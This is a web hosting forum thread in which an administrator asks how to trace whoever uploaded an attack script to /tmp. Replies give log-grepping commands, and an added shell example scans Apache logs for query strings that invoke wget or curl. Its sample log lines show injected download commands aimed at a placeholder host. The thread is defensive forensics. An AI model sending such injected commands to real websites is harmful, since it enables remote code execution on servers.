  1. #1
    Member
    Join Date
    Sep 2003
    Posts
    149

    how to track hacker?

    Hi,

    I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.

    I think they are uploaded through a site which has a vulnerable script, but I am not sure what commands to run to catch this little sod.

    What lines should I run to find out who uploaded/ran extrupator.pl?

  2. #2
    Member
    Join Date
    May 2004
    Location
    South East England
    Posts
    71

    You could replace the script with one that logs their IP as well as the hostname it was run through (I think that can be done). That should help you find them. Make sure it emails it to an off-site email address, though.
    Alex A. Smith MCP
    Wired Network LTD Managing Director

  3. #3
    Member
    Join Date
    Sep 2003
    Posts
    149

    That would be cool. Where would I get such a script?

  4. #4
    Member sawbuck's Avatar
    Join Date
    Jan 2004
    Posts
    1,313
    cPanel/Enkompass Access Level

    Root Administrator

  5. #5
    Member
    Join Date
    Sep 2003
    Posts
    149

    Originally posted by edewing
    You might try logcheck.
    http://www.astro.uiuc.edu/~r-dass/logcheck/
    That looks good, but the actual link to the script is a dead one:
    http://www.psionic.com/abacus/logcheck

  6. #6
    Ben
    Member
    Join Date
    Aug 2002
    Posts
    77

    If you are using phpSuExec, then determining the vulnerable site is easy.

    If you aren't, it's harder.

    If you are, run

    ls -la file.pl

    That should tell you the owner of the file.

    Then go to /usr/local/apache/domlogs/ and run

    grep wget `ls | grep username`

    This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like

    index.php?x=wget bad file

    What you do with the site from there is up to you.

    If you don't use phpSuExec, then you can run the following. Please note that this command can be load intensive and take a while to run:

    grep filename.pl *.com

    If there are no results, proceed to the other TLDs on your machine, e.g.

    grep filename.pl *.net

    That will show you instances where most likely the file was wget'ed, and can also determine the site. Yet again, what to do with it is up to you.

    HTH,

    Ben
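
The two grep passes in the post above can be done in one scan that also reports the client IP and timestamp of each hit. This is an added example, not part of the thread: the function names and the log lines are constructed, the curl and lwp-download patterns are an assumption beyond the wget the post searches for, and it assumes Apache combined-format logs.

```shell
#!/bin/sh
# Added example, not from the thread. All log lines below are constructed.

# scan_domlogs DIR NEEDLE
# Prints "logfile<TAB>client IP<TAB>timestamp<TAB>request" for each request whose
# URL contains NEEDLE, or whose query string invokes a download tool.
scan_domlogs() {
    find "$1" -maxdepth 1 -type f -exec awk -F'"' -v needle="$2" '
    {
        req = tolower($2)                    # $2 = request line in combined format
        sub(/ http\/[0-9.]+$/, "", req)      # drop the trailing protocol token
        hit = (needle != "" && index(req, tolower(needle)) > 0)
        # Tool list is an assumption; the thread itself only greps for wget.
        if (hit || req ~ /\?.*(wget|curl|lwp-download)(%20|\+| )/) {
            split($1, head, " ")             # head[1] = client IP, head[4] = "[time"
            ts = head[4]; sub(/^\[/, "", ts)
            printf "%s\t%s\t%s\t%s\n", FILENAME, head[1], ts, $2
        }
    }' {} +
}

# make_sample_domlogs DIR: write two constructed per-domain logs for the demo.
make_sample_domlogs() {
    cat > "$1/example.com" <<'EOF'
198.51.100.4 - - [12/May/2004:10:15:30 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/May/2004:10:15:32 +0100] "GET /index.php?x=wget%20http://files.invalid/extrupator.pl HTTP/1.1" 200 512 "-" "Mozilla/4.0"
EOF
    cat > "$1/example.net" <<'EOF'
198.51.100.9 - - [12/May/2004:11:02:01 +0100] "GET /docs/curl.html?ref=wget HTTP/1.1" 200 900 "-" "Mozilla/4.0"
203.0.113.7 - - [12/May/2004:11:05:44 +0100] "GET /view.php?page=curl+-O+http://files.invalid/x.txt HTTP/1.1" 200 300 "-" "Mozilla/4.0"
EOF
}

# Demo run against the constructed logs; on a real server pass the domlogs
# directory and the name of the file found in /tmp instead.
demo=$(mktemp -d)
make_sample_domlogs "$demo"
scan_domlogs "$demo" extrupator.pl
rm -rf "$demo"
```

The first column names the per-domain log, which identifies the site whose script accepted the request; the second column is the address to look for in the rest of that log.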

  7. #7
    Member sawbuck's Avatar
    Join Date
    Jan 2004
    Posts
    1,313
    cPanel/Enkompass Access Level

    Root Administrator

    Sorry about the bad link. Try: http://linux.maruhn.com/sec/logcheck.html
    If using rpm there are also links for those packages.

  8. #8
    Member
    Join Date
    Sep 2003
    Posts
    149

    Originally posted by edewing
    Sorry about the bad link. Try: http://linux.maruhn.com/sec/logcheck.html
    If using rpm there are also links for those packages.
    Thanks
